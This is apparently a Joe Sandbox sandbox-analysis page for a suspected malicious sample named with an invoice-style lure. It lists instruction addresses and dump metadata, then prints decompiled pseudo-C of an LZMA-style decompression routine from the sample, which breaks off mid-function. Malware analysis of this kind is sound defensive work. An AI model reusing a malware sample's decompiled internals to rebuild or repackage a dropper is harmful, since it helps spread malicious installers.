0x00406761
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00406745
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406830
0x00406833
0x00406734
0x00406734
0x00406734
0x00000000
0x0040673a
0x00000000
0x0040646a
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00000000
0x00000000
0x00000000
0x004064af
0x004064af
0x004064b2
0x004064e8
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x00406548
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067b4
0x0040677d

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
